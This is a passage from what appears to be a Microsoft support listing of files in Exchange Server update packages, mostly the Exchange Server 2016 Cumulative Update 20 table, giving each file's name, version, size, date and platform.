04-Apr-2021| 10:04| Not applicable \n_search.tokenoperators.b| 15.2.792.13| 113,544| 04-Apr-2021| 10:04| Not applicable \n_search.transportoperators.a| 15.2.792.13| 67,968| 04-Apr-2021| 10:06| Not applicable \n_search.transportoperators.b| 15.2.792.13| 67,968| 04-Apr-2021| 10:06| Not applicable \n \n#### \n\n__\n\nMicrosoft Exchange Server 2016 Cumulative Update 20\n\nFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nActivemonitoringeventmsg.dll| 15.1.2242.5| 71,040| 04-Apr-2021| 09:12| x64 \nActivemonitoringexecutionlibrary.ps1| Not applicable| 29,546| 04-Apr-2021| 09:11| Not applicable \nAdduserstopfrecursive.ps1| Not applicable| 14,929| 04-Apr-2021| 09:16| Not applicable \nAdemodule.dll| 15.1.2242.5| 106,392| 04-Apr-2021| 09:11| x64 \nAirfilter.dll| 15.1.2242.5| 42,872| 04-Apr-2021| 09:12| x64 \nAjaxcontroltoolkit.dll| 15.1.2242.5| 92,560| 04-Apr-2021| 09:12| x86 \nAntispamcommon.ps1| Not applicable| 13,489| 04-Apr-2021| 09:11| Not applicable \nAsdat.msi| Not applicable| 5,087,232| 04-Apr-2021| 09:11| Not applicable \nAsentirs.msi| Not applicable| 77,824| 04-Apr-2021| 09:11| Not applicable \nAsentsig.msi| Not applicable| 73,728| 04-Apr-2021| 09:14| Not applicable \nBigfunnel.bondtypes.dll| 15.1.2242.5| 43,904| 04-Apr-2021| 09:11| x86 \nBigfunnel.common.dll| 15.1.2242.5| 63,880| 04-Apr-2021| 09:11| x86 \nBigfunnel.configuration.dll| 15.1.2242.5| 99,224| 04-Apr-2021| 09:11| x86 \nBigfunnel.entropy.dll| 15.1.2242.5| 44,424| 04-Apr-2021| 09:11| x86 \nBigfunnel.filter.dll| 15.1.2242.5| 54,152| 04-Apr-2021| 09:11| x86 \nBigfunnel.indexstream.dll| 15.1.2242.5| 54,152| 04-Apr-2021| 09:11| x86 \nBigfunnel.poi.dll| 15.1.2242.5| 203,672| 04-Apr-2021| 09:13| x86 \nBigfunnel.postinglist.dll| 15.1.2242.5| 122,232| 04-Apr-2021| 09:11| x86 \nBigfunnel.query.dll| 15.1.2242.5| 99,736| 04-Apr-2021| 09:11| x86 \nBigfunnel.ranking.dll| 15.1.2242.5| 79,224| 04-Apr-2021| 09:13| x86 \nBigfunnel.syntheticdatalib.dll| 15.1.2242.5| 3,634,576| 04-Apr-2021| 09:11| x86 \nBigfunnel.wordbreakers.dll| 15.1.2242.5| 46,488| 04-Apr-2021| 09:11| x86 \nCafe_airfilter_dll| 15.1.2242.5| 42,872| 04-Apr-2021| 09:12| x64 \nCafe_exppw_dll| 15.1.2242.5| 83,328| 04-Apr-2021| 09:11| x64 \nCafe_owaauth_dll| 15.1.2242.5| 92,032| 04-Apr-2021| 09:12| x64 \nCalcalculation.ps1| Not applicable| 42,137| 04-Apr-2021| 09:13| Not applicable \nCheckdatabaseredundancy.ps1| Not applicable| 94,606| 04-Apr-2021| 09:11| Not applicable \nChksgfiles.dll| 15.1.2242.5| 57,224| 04-Apr-2021| 09:11| x64 \nCitsconstants.ps1| Not applicable| 15,845| 04-Apr-2021| 09:12| Not applicable \nCitslibrary.ps1| Not applicable| 82,700| 04-Apr-2021| 09:11| Not applicable \nCitstypes.ps1| Not applicable| 14,504| 04-Apr-2021| 09:11| Not applicable \nClassificationengine_mce| 15.1.2242.5| 1,693,064| 04-Apr-2021| 09:13| Not applicable \nClusmsg.dll| 15.1.2242.5| 134,024| 04-Apr-2021| 09:13| x64 \nCoconet.dll| 15.1.2242.5| 48,008| 04-Apr-2021| 09:12| x64 \nCollectovermetrics.ps1| Not applicable| 81,644| 04-Apr-2021| 09:11| Not applicable \nCollectreplicationmetrics.ps1| Not applicable| 41,870| 04-Apr-2021| 09:11| Not applicable \nCommonconnectfunctions.ps1| Not applicable| 29,931| 04-Apr-2021| 09:11| Not applicable \nComplianceauditservice.exe| 15.1.2242.8| 39,824| 04-Apr-2021| 09:11| x86 \nConfigureadam.ps1| Not applicable| 22,764| 04-Apr-2021| 09:15| Not applicable \nConfigurecaferesponseheaders.ps1| Not applicable| 20,308| 04-Apr-2021| 09:12| Not applicable \nConfigurenetworkprotocolparameters.ps1| Not applicable| 19,770| 04-Apr-2021| 09:12| Not applicable \nConfiguresmbipsec.ps1| Not applicable| 39,828| 04-Apr-2021| 09:15| Not applicable \nConfigure_enterprisepartnerapplication.ps1| Not applicable| 22,283| 04-Apr-2021| 09:16| Not applicable \nConnectfunctions.ps1| Not applicable| 37,125| 04-Apr-2021| 09:11| Not applicable \nConnect_exchangeserver_help.xml| Not applicable| 30,396| 04-Apr-2021| 09:11| Not applicable \nConsoleinitialize.ps1| Not applicable| 24,248| 04-Apr-2021| 09:16| Not applicable \nConvertoabvdir.ps1| Not applicable| 20,053| 04-Apr-2021| 09:15| Not applicable \nConverttomessagelatency.ps1| Not applicable| 14,532| 04-Apr-2021| 09:16| Not applicable \nConvert_distributiongrouptounifiedgroup.ps1| Not applicable| 34,765| 04-Apr-2021| 09:15| Not applicable \nCreate_publicfoldermailboxesformigration.ps1| Not applicable| 27,912| 04-Apr-2021| 09:16| Not applicable \nCts.14.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 501| 04-Apr-2021| 07:13| Not applicable \nCts.14.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 501| 04-Apr-2021| 07:13| Not applicable \nCts.14.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 501| 04-Apr-2021| 07:13| Not applicable \nCts.14.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 501| 04-Apr-2021| 07:13| Not applicable \nCts.14.4.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 501| 04-Apr-2021| 07:13| Not applicable \nCts.15.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 501| 04-Apr-2021| 07:13| Not applicable \nCts.15.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 501| 04-Apr-2021| 07:13| Not applicable \nCts.15.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 501| 04-Apr-2021| 07:13| Not applicable \nCts.15.20.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 501| 04-Apr-2021| 07:13| Not applicable \nCts.8.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 501| 04-Apr-2021| 07:13| Not applicable \nCts.8.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 501| 04-Apr-2021| 07:13| Not applicable \nCts.8.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 501| 04-Apr-2021| 07:13| Not applicable \nCts_exsmime.dll| 15.1.2242.5| 380,800| 04-Apr-2021| 09:12| x64 \nCts_microsoft.exchange.data.common.dll| 15.1.2242.5| 1,686,920| 04-Apr-2021| 09:12| x86 \nCts_microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 501| 04-Apr-2021| 07:13| Not applicable \nCts_policy.14.0.microsoft.exchange.data.common.dll| 15.1.2242.5| 12,672| 04-Apr-2021| 09:13| x86 \nCts_policy.14.1.microsoft.exchange.data.common.dll| 15.1.2242.5| 12,664| 04-Apr-2021| 09:11| x86 \nCts_policy.14.2.microsoft.exchange.data.common.dll| 15.1.2242.5| 12,672| 04-Apr-2021| 09:13| x86 \nCts_policy.14.3.microsoft.exchange.data.common.dll| 15.1.2242.5| 12,688| 04-Apr-2021| 09:11| x86 \nCts_policy.14.4.microsoft.exchange.data.common.dll| 15.1.2242.5| 12,696| 04-Apr-2021| 09:13| x86 \nCts_policy.15.0.microsoft.exchange.data.common.dll| 15.1.2242.5| 12,680| 04-Apr-2021| 09:13| x86 \nCts_policy.15.1.microsoft.exchange.data.common.dll| 15.1.2242.5| 12,672| 04-Apr-2021| 09:11| x86 \nCts_policy.15.2.microsoft.exchange.data.common.dll| 15.1.2242.5| 12,696| 04-Apr-2021| 09:11| x86 \nCts_policy.15.20.microsoft.exchange.data.common.dll| 15.1.2242.5| 12,672| 04-Apr-2021| 09:13| x86 \nCts_policy.8.0.microsoft.exchange.data.common.dll| 15.1.2242.5| 12,664| 04-Apr-2021| 09:11| x86 \nCts_policy.8.1.microsoft.exchange.data.common.dll| 15.1.2242.5| 12,664| 04-Apr-2021| 09:11| x86 \nCts_policy.8.2.microsoft.exchange.data.common.dll| 15.1.2242.5| 12,664| 04-Apr-2021| 09:11| x86 \nCts_policy.8.3.microsoft.exchange.data.common.dll| 15.1.2242.5| 12,664| 04-Apr-2021| 09:11| x86 \nDagcommonlibrary.ps1| Not applicable| 60,262| 04-Apr-2021| 09:11| Not applicable \nDependentassemblygenerator.exe| 15.1.2242.5| 22,400| 04-Apr-2021| 09:11| x86 \nDiaghelper.dll| 15.1.2242.5| 66,968| 04-Apr-2021| 09:11| x86 \nDiagnosticscriptcommonlibrary.ps1| Not applicable| 16,370| 04-Apr-2021| 09:11| Not applicable \nDisableinmemorytracing.ps1| Not applicable| 13,362| 04-Apr-2021| 09:16| Not applicable \nDisable_antimalwarescanning.ps1| Not applicable| 15,189| 04-Apr-2021| 09:16| Not applicable \nDisable_outsidein.ps1| Not applicable| 13,654| 04-Apr-2021| 09:14| Not applicable \nDisklockerapi.dll| Not applicable| 22,392| 04-Apr-2021| 09:11| x64 \nDlmigrationmodule.psm1| Not applicable| 39,580| 04-Apr-2021| 09:15| Not applicable \nDsaccessperf.dll| 15.1.2242.5| 45,960| 04-Apr-2021| 09:12| x64 \nDscperf.dll| 15.1.2242.5| 32,664| 04-Apr-2021| 09:14| x64 \nDup_cts_microsoft.exchange.data.common.dll| 15.1.2242.5| 1,686,920| 04-Apr-2021| 09:12| x86 \nDup_ext_microsoft.exchange.data.transport.dll| 15.1.2242.5| 601,488| 04-Apr-2021| 09:11| x86 \nEcpperfcounters.xml| Not applicable| 31,188| 04-Apr-2021| 09:14| Not applicable \nEdgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 504| 04-Apr-2021| 07:13| Not applicable \nEdgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll| 15.1.2242.5| 12,672| 04-Apr-2021| 09:11| x86 \nEdgetransport.exe| 15.1.2242.8| 49,544| 04-Apr-2021| 09:11| x86 \nEext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 504| 04-Apr-2021| 07:13| Not applicable \nEext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 504| 04-Apr-2021| 07:13| Not applicable \nEext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 504| 04-Apr-2021| 07:13| Not applicable \nEext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 504| 04-Apr-2021| 07:13| Not applicable \nEext.14.4.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 504| 04-Apr-2021| 07:13| Not applicable \nEext.15.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 504| 04-Apr-2021| 07:13| Not applicable \nEext.15.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 504| 04-Apr-2021| 07:13| Not applicable \nEext.15.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 504| 04-Apr-2021| 07:13| Not applicable \nEext.15.20.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 504| 04-Apr-2021| 07:13| Not applicable \nEext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 504| 04-Apr-2021| 07:13| Not applicable \nEext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 504| 04-Apr-2021| 07:13| Not applicable \nEext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 504| 04-Apr-2021| 07:13| Not applicable \nEext_policy.14.0.microsoft.exchange.data.transport.dll| 15.1.2242.5| 12,672| 04-Apr-2021| 09:11| x86 \nEext_policy.14.1.microsoft.exchange.data.transport.dll| 15.1.2242.5| 12,680| 04-Apr-2021| 09:11| x86 \nEext_policy.14.2.microsoft.exchange.data.transport.dll| 15.1.2242.5| 12,696| 04-Apr-2021| 09:11| x86 \nEext_policy.14.3.microsoft.exchange.data.transport.dll| 15.1.2242.5| 12,664| 04-Apr-2021| 09:11| x86 \nEext_policy.14.4.microsoft.exchange.data.transport.dll| 15.1.2242.5| 12,696| 04-Apr-2021| 09:13| x86 \nEext_policy.15.0.microsoft.exchange.data.transport.dll| 15.1.2242.5| 12,680| 04-Apr-2021| 09:11| x86 \nEext_policy.15.1.microsoft.exchange.data.transport.dll| 15.1.2242.5| 12,664| 04-Apr-2021| 09:13| x86 \nEext_policy.15.2.microsoft.exchange.data.transport.dll| 15.1.2242.5| 12,688| 04-Apr-2021| 09:11| x86 \nEext_policy.15.20.microsoft.exchange.data.transport.dll| 15.1.2242.5| 13,184| 04-Apr-2021| 09:12| x86 \nEext_policy.8.1.microsoft.exchange.data.transport.dll| 15.1.2242.5| 12,696| 04-Apr-2021| 09:11| x86 \nEext_policy.8.2.microsoft.exchange.data.transport.dll| 15.1.2242.5| 12,672| 04-Apr-2021| 09:13| x86 \nEext_policy.8.3.microsoft.exchange.data.transport.dll| 15.1.2242.5| 12,696| 04-Apr-2021| 09:11| x86 \nEnableinmemorytracing.ps1| Not applicable| 13,364| 04-Apr-2021| 09:15| Not applicable \nEnable_antimalwarescanning.ps1| Not applicable| 17,563| 04-Apr-2021| 09:16| Not applicable \nEnable_basicauthtooauthconverterhttpmodule.ps1| Not applicable| 18,588| 04-Apr-2021| 09:15| Not applicable \nEnable_crossforestconnector.ps1| Not applicable| 18,598| 04-Apr-2021| 09:15| Not applicable \nEnable_outlookcertificateauthentication.ps1| Not applicable| 22,916| 04-Apr-2021| 09:16| Not applicable \nEnable_outsidein.ps1| Not applicable| 13,647| 04-Apr-2021| 09:15| Not applicable \nEngineupdateserviceinterfaces.dll| 15.1.2242.5| 17,800| 04-Apr-2021| 09:12| x86 \nEscprint.dll| 15.1.2242.5| 20,360| 04-Apr-2021| 09:11| x64 \nEse.dll| 15.1.2242.5| 3,695,496| 04-Apr-2021| 09:13| x64 \nEseback2.dll| 15.1.2242.5| 325,008| 04-Apr-2021| 09:11| x64 \nEsebcli2.dll| 15.1.2242.5| 292,736| 04-Apr-2021| 09:12| x64 \nEseperf.dll| 15.1.2242.5| 116,120| 04-Apr-2021| 09:14| x64 \nEseutil.exe| 15.1.2242.5| 398,744| 04-Apr-2021| 09:13| x64 \nEsevss.dll| 15.1.2242.5| 44,440| 04-Apr-2021| 09:11| x64 \nEtweseproviderresources.dll| 15.1.2242.5| 82,312| 04-Apr-2021| 09:11| x64 \nEventperf.dll| 15.1.2242.5| 59,776| 04-Apr-2021| 09:11| x64 \nExchange.depthtwo.types.ps1xml| Not applicable| 40,093| 04-Apr-2021| 09:11| Not applicable \nExchange.format.ps1xml| Not applicable| 648,596| 04-Apr-2021| 09:11| Not applicable \nExchange.partial.types.ps1xml| Not applicable| 43,310| 04-Apr-2021| 09:11| Not applicable \nExchange.ps1| Not applicable| 20,791| 04-Apr-2021| 09:11| Not applicable \nExchange.support.format.ps1xml| Not applicable| 26,535| 04-Apr-2021| 09:11| Not applicable \nExchange.types.ps1xml| Not applicable| 365,133| 04-Apr-2021| 09:11| Not applicable \nExchangeudfcommon.dll| 15.1.2242.5| 121,720| 04-Apr-2021| 09:11| x86 \nExchangeudfs.dll| 15.1.2242.5| 269,688| 04-Apr-2021| 09:11| x86 \nExchmem.dll| 15.1.2242.5| 85,880| 04-Apr-2021| 09:11| x64 \nExchsetupmsg.dll| 15.1.2242.5| 19,352| 04-Apr-2021| 09:13| x64 \nExchucutil.ps1| Not applicable| 23,920| 04-Apr-2021| 09:15| Not applicable \nExdbfailureitemapi.dll| Not applicable| 27,032| 04-Apr-2021| 09:12| x64 \nExdbmsg.dll| 15.1.2242.5| 229,768| 04-Apr-2021| 09:11| x64 \nExeventperfplugin.dll| 15.1.2242.5| 25,464| 04-Apr-2021| 09:14| x64 \nExmime.dll| 15.1.2242.5| 364,944| 04-Apr-2021| 09:11| x64 \nExportedgeconfig.ps1| Not applicable| 27,391| 04-Apr-2021| 09:15| Not applicable \nExport_mailpublicfoldersformigration.ps1| Not applicable| 18,558| 04-Apr-2021| 09:15| Not applicable \nExport_modernpublicfolderstatistics.ps1| Not applicable| 28,854| 04-Apr-2021| 09:16| Not applicable \nExport_outlookclassification.ps1| Not applicable| 14,418| 04-Apr-2021| 09:16| Not applicable \nExport_publicfolderstatistics.ps1| Not applicable| 23,125| 04-Apr-2021| 09:15| Not applicable \nExport_retentiontags.ps1| Not applicable| 17,044| 04-Apr-2021| 09:15| Not applicable \nExppw.dll| 15.1.2242.5| 83,328| 04-Apr-2021| 09:11| x64 \nExprfdll.dll| 15.1.2242.5| 26,504| 04-Apr-2021| 09:14| x64 \nExrpc32.dll| 15.1.2242.5| 1,922,952| 04-Apr-2021| 09:12| x64 \nExrw.dll| 15.1.2242.5| 28,040| 04-Apr-2021| 09:12| x64 \nExsetdata.dll| 15.1.2242.5| 2,779,008| 04-Apr-2021| 09:11| x64 \nExsetup.exe| 15.1.2242.8| 35,208| 04-Apr-2021| 09:12| x86 \nExsetupui.exe| 15.1.2242.8| 193,416| 04-Apr-2021| 09:13| x86 \nExtrace.dll| 15.1.2242.5| 245,128| 04-Apr-2021| 09:11| x64 \nExt_microsoft.exchange.data.transport.dll| 15.1.2242.5| 601,488| 04-Apr-2021| 09:11| x86 \nExwatson.dll| 15.1.2242.5| 44,952| 04-Apr-2021| 09:12| x64 \nFastioext.dll| 15.1.2242.5| 60,296| 04-Apr-2021| 09:11| x64 \nFil06f84122c94c91a0458cad45c22cce20| Not applicable| 784,714| 04-Apr-2021| 09:15| Not applicable \nFil143a7a5d4894478a85eefc89a6539fc8| Not applicable| 1,909,228| 04-Apr-2021| 09:14| Not applicable \nFil19f527f284a0bb584915f9994f4885c3| Not applicable| 648,760| 04-Apr-2021| 09:14| Not applicable \nFil1a9540363a531e7fb18ffe600cffc3ce| Not applicable| 358,405| 04-Apr-2021| 09:15| Not applicable \nFil220d95210c8697448312eee6628c815c| Not applicable| 303,657| 04-Apr-2021| 09:16| Not applicable \nFil2cf5a31e239a45fabea48687373b547c| Not applicable| 652,726| 04-Apr-2021| 09:15| Not applicable \nFil397f0b1f1d7bd44d6e57e496decea2ec| Not applicable| 784,711| 04-Apr-2021| 09:14| Not applicable \nFil3ab126057b34eee68c4fd4b127ff7aee| Not applicable| 784,687| 04-Apr-2021| 09:14| Not applicable \nFil41bb2e5743e3bde4ecb1e07a76c5a7a8| Not applicable| 149,154| 04-Apr-2021| 09:15| Not applicable \nFil51669bfbda26e56e3a43791df94c1e9c| Not applicable| 9,345| 04-Apr-2021| 09:15| Not applicable \nFil558cb84302edfc96e553bcfce2b85286| Not applicable| 85,259| 04-Apr-2021| 09:14| Not applicable \nFil55ce217251b77b97a46e914579fc4c64| Not applicable| 648,754| 04-Apr-2021| 09:14| Not applicable \nFil5a9e78a51a18d05bc36b5e8b822d43a8| Not applicable| 1,597,359| 04-Apr-2021| 09:14| Not applicable \nFil5c7d10e5f1f9ada1e877c9aa087182a9| Not applicable| 1,597,359| 04-Apr-2021| 09:14| Not applicable \nFil6569a92c80a1e14949e4282ae2cc699c| Not applicable| 1,597,359| 04-Apr-2021| 09:14| Not applicable \nFil6a01daba551306a1e55f0bf6894f4d9f| Not applicable| 648,730| 04-Apr-2021| 09:15| Not applicable \nFil8863143ea7cd93a5f197c9fff13686bf| Not applicable| 648,760| 04-Apr-2021| 09:15| Not applicable \nFil8a8c76f225c7205db1000e8864c10038| Not applicable| 1,597,359| 04-Apr-2021| 09:14| Not applicable \nFil8cd999415d36ba78a3ac16a080c47458| Not applicable| 784,717| 04-Apr-2021| 09:14| Not applicable \nFil97913e630ff02079ce9889505a517ec0| Not applicable| 1,597,359| 04-Apr-2021| 09:14| Not applicable \nFilaa49badb2892075a28d58d06560f8da2| Not applicable| 785,741| 04-Apr-2021| 09:15| Not applicable \nFilae28aeed23ccb4b9b80accc2d43175b5| Not applicable| 648,757| 04-Apr-2021| 09:15| Not applicable \nFilb17f496f9d880a684b5c13f6b02d7203| Not applicable| 784,717| 04-Apr-2021| 09:14| Not applicable \nFilb94ca32f2654692263a5be009c0fe4ca| Not applicable| 2,564,949| 04-Apr-2021| 09:15| Not applicable \nFilbabdc4808eba0c4f18103f12ae955e5c| Not applicable| 342,549,421| 04-Apr-2021| 09:16| Not applicable \nFilc92cf2bf29bed21bd5555163330a3d07| Not applicable| 652,744| 04-Apr-2021| 09:14| Not applicable \nFilcc478d2a8346db20c4e2dc36f3400628| Not applicable| 784,717| 04-Apr-2021| 09:14| Not applicable \nFild26cd6b13cfe2ec2a16703819da6d043| Not applicable| 1,597,359| 04-Apr-2021| 09:14| Not applicable \nFilf2719f9dc8f7b74df78ad558ad3ee8a6| Not applicable| 785,723| 04-Apr-2021| 09:14| Not applicable \nFilfa5378dc76359a55ef20cc34f8a23fee| Not applicable| 1,427,187| 04-Apr-2021| 09:15| Not applicable \nFilteringconfigurationcommands.ps1| Not applicable| 18,231| 04-Apr-2021| 09:14| Not applicable \nFilteringpowershell.dll| 15.1.2242.5| 223,112| 04-Apr-2021| 09:11| x86 \nFilteringpowershell.format.ps1xml| Not applicable| 29,668| 04-Apr-2021| 09:12| Not applicable \nFiltermodule.dll| 15.1.2242.5| 180,088| 04-Apr-2021| 09:12| x64 \nFipexeuperfctrresource.dll| 15.1.2242.5| 15,256| 04-Apr-2021| 09:11| x64 \nFipexeventsresource.dll| 15.1.2242.5| 44,936| 04-Apr-2021| 09:14| x64 \nFipexperfctrresource.dll| 15.1.2242.5| 32,656| 04-Apr-2021| 09:11| x64 \nFirewallres.dll| 15.1.2242.5| 72,584| 04-Apr-2021| 09:12| x64 \nFms.exe| 15.1.2242.5| 1,350,040| 04-Apr-2021| 09:12| x64 \nForefrontactivedirectoryconnector.exe| 15.1.2242.5| 110,976| 04-Apr-2021| 09:12| x64 \nFpsdiag.exe| 15.1.2242.5| 18,816| 04-Apr-2021| 09:11| x86 \nFsccachedfilemanagedlocal.dll| 15.1.2242.5| 822,136| 04-Apr-2021| 09:11| x64 \nFscconfigsupport.dll| 15.1.2242.5| 56,728| 04-Apr-2021| 09:12| x86 \nFscconfigurationserver.exe| 15.1.2242.5| 431,000| 04-Apr-2021| 09:11| x64 \nFscconfigurationserverinterfaces.dll| 15.1.2242.5| 15,744| 04-Apr-2021| 09:11| x86 \nFsccrypto.dll| 15.1.2242.5| 208,768| 04-Apr-2021| 09:11| x64 \nFscipcinterfaceslocal.dll| 15.1.2242.5| 28,568| 04-Apr-2021| 09:11| x86 \nFscipclocal.dll| 15.1.2242.5| 38,272| 04-Apr-2021| 09:11| x86 \nFscsqmuploader.exe| 15.1.2242.5| 453,520| 04-Apr-2021| 09:12| x64 \nGetucpool.ps1| Not applicable| 19,775| 04-Apr-2021| 09:15| Not applicable \nGetvalidengines.ps1| Not applicable| 13,310| 04-Apr-2021| 09:11| Not applicable \nGet_antispamfilteringreport.ps1| Not applicable| 15,793| 04-Apr-2021| 09:11| Not applicable \nGet_antispamsclhistogram.ps1| Not applicable| 14,639| 04-Apr-2021| 09:12| Not applicable \nGet_antispamtopblockedsenderdomains.ps1| Not applicable| 15,711| 04-Apr-2021| 09:11| Not applicable \nGet_antispamtopblockedsenderips.ps1| Not applicable| 14,759| 04-Apr-2021| 09:11| Not applicable \nGet_antispamtopblockedsenders.ps1| Not applicable| 15,482| 04-Apr-2021| 09:11| Not applicable \nGet_antispamtoprblproviders.ps1| Not applicable| 14,689| 04-Apr-2021| 09:11| Not applicable \nGet_antispamtoprecipients.ps1| Not applicable| 14,794| 04-Apr-2021| 09:11| Not applicable \nGet_dleligibilitylist.ps1| Not applicable| 42,336| 04-Apr-2021| 09:15| Not applicable \nGet_exchangeetwtrace.ps1| Not applicable| 28,947| 04-Apr-2021| 09:16| Not applicable \nGet_publicfoldermailboxsize.ps1| Not applicable| 15,026| 04-Apr-2021| 09:15| Not applicable \nGet_storetrace.ps1| Not applicable| 50,615| 04-Apr-2021| 09:11| Not applicable \nHuffman_xpress.dll| 15.1.2242.5| 32,632| 04-Apr-2021| 09:12| x64 \nImportedgeconfig.ps1| Not applicable| 77,248| 04-Apr-2021| 09:15| Not applicable \nImport_mailpublicfoldersformigration.ps1| Not applicable| 29,480| 04-Apr-2021| 09:15| Not applicable \nImport_retentiontags.ps1| Not applicable| 28,818| 04-Apr-2021| 09:15| Not applicable \nInproxy.dll| 15.1.2242.5| 85,880| 04-Apr-2021| 09:14| x64 \nInstallwindowscomponent.ps1| Not applicable| 34,559| 04-Apr-2021| 09:13| Not applicable \nInstall_antispamagents.ps1| Not applicable| 17,913| 04-Apr-2021| 09:11| Not applicable \nInstall_odatavirtualdirectory.ps1| Not applicable| 17,983| 04-Apr-2021| 09:11| Not applicable \nInterop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.1.2242.5| 107,400| 04-Apr-2021| 09:11| Not applicable \nInterop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.1.2242.5| 20,344| 04-Apr-2021| 09:11| Not applicable \nInterop.certenroll.dll| 15.1.2242.5| 142,728| 04-Apr-2021| 09:12| x86 \nInterop.licenseinfointerface.dll| 15.1.2242.5| 14,232| 04-Apr-2021| 09:12| x86 \nInterop.netfw.dll| 15.1.2242.5| 34,200| 04-Apr-2021| 09:11| x86 \nInterop.plalibrary.dll| 15.1.2242.5| 72,600| 04-Apr-2021| 09:11| x86 \nInterop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.1.2242.5| 27,016| 04-Apr-2021| 09:11| Not applicable \nInterop.taskscheduler.dll| 15.1.2242.5| 46,464| 04-Apr-2021| 09:11| x86 \nInterop.wuapilib.dll| 15.1.2242.5| 60,824| 04-Apr-2021| 09:11| x86 \nInterop.xenroll.dll| 15.1.2242.5| 39,808| 04-Apr-2021| 09:11| x86 \nKerbauth.dll| 15.1.2242.5| 62,848| 04-Apr-2021| 09:12| x64 \nLicenseinfointerface.dll| 15.1.2242.5| 643,472| 04-Apr-2021| 09:11| x64 \nLpversioning.xml| Not applicable| 20,454| 04-Apr-2021| 09:11| Not applicable \nMailboxdatabasereseedusingspares.ps1| Not applicable| 31,904| 04-Apr-2021| 09:11| Not applicable \nManagedavailabilitycrimsonmsg.dll| 15.1.2242.5| 138,632| 04-Apr-2021| 09:12| x64 \nManagedstorediagnosticfunctions.ps1| Not applicable| 125,841| 04-Apr-2021| 09:11| Not applicable \nManagescheduledtask.ps1| Not applicable| 36,340| 04-Apr-2021| 09:11| Not applicable \nMce.dll| 15.1.2242.5| 1,693,064| 04-Apr-2021| 09:13| x64 \nMeasure_storeusagestatistics.ps1| Not applicable| 29,487| 04-Apr-2021| 09:11| Not applicable \nMerge_publicfoldermailbox.ps1| Not applicable| 22,623| 04-Apr-2021| 09:16| Not applicable \nMicrosoft.database.isam.dll| 15.1.2242.5| 127,360| 04-Apr-2021| 09:11| x86 \nMicrosoft.dkm.proxy.dll| 15.1.2242.5| 26,008| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.activemonitoring.activemonitoringvariantconfig.dll| 15.1.2242.5| 68,504| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.activemonitoring.eventlog.dll| 15.1.2242.5| 17,800| 04-Apr-2021| 09:13| x64 \nMicrosoft.exchange.addressbook.service.dll| 15.1.2242.8| 232,848| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.addressbook.service.eventlog.dll| 15.1.2242.5| 15,752| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.airsync.airsyncmsg.dll| 15.1.2242.5| 43,408| 04-Apr-2021| 09:13| x64 \nMicrosoft.exchange.airsync.comon.dll| 15.1.2242.8| 1,775,512| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.airsync.dll1| 15.1.2242.8| 505,736| 04-Apr-2021| 09:11| Not applicable \nMicrosoft.exchange.airsynchandler.dll| 15.1.2242.8| 76,168| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.anchorservice.dll| 15.1.2242.8| 135,576| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.antispam.eventlog.dll| 15.1.2242.5| 23,424| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.antispamupdate.eventlog.dll| 15.1.2242.5| 15,752| 04-Apr-2021| 09:13| x64 \nMicrosoft.exchange.antispamupdatesvc.exe| 15.1.2242.8| 27,008| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.approval.applications.dll| 15.1.2242.8| 53,656| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.assistants.dll| 15.1.2242.8| 924,040| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.assistants.eventlog.dll| 15.1.2242.5| 25,976| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.assistants.interfaces.dll| 15.1.2242.5| 42,360| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.audit.azureclient.dll| 15.1.2242.8| 15,232| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.auditlogsearch.eventlog.dll| 15.1.2242.5| 14,720| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.auditlogsearchservicelet.dll| 15.1.2242.8| 70,536| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.dll| 15.1.2242.8| 94,600| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.eventlog.dll| 15.1.2242.5| 13,192| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.authadmin.eventlog.dll| 